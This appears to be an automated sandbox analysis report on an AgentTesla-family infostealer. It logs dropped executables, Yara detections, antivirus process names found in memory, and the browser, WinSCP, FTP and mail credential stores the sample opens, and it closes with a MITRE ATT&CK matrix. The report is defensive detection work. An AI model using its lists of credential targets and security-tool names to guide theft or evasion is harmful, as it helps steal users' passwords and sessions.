Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E6920C GetLocalTime,

0_2_02E6920C

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe

Code function: 0_2_02E6B78C GetVersionExA,

0_2_02E6B78C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	311 Process Injection	1 Timestomp	NTDS	47 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	311 Masquerading	Cached Domain Credentials	431 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
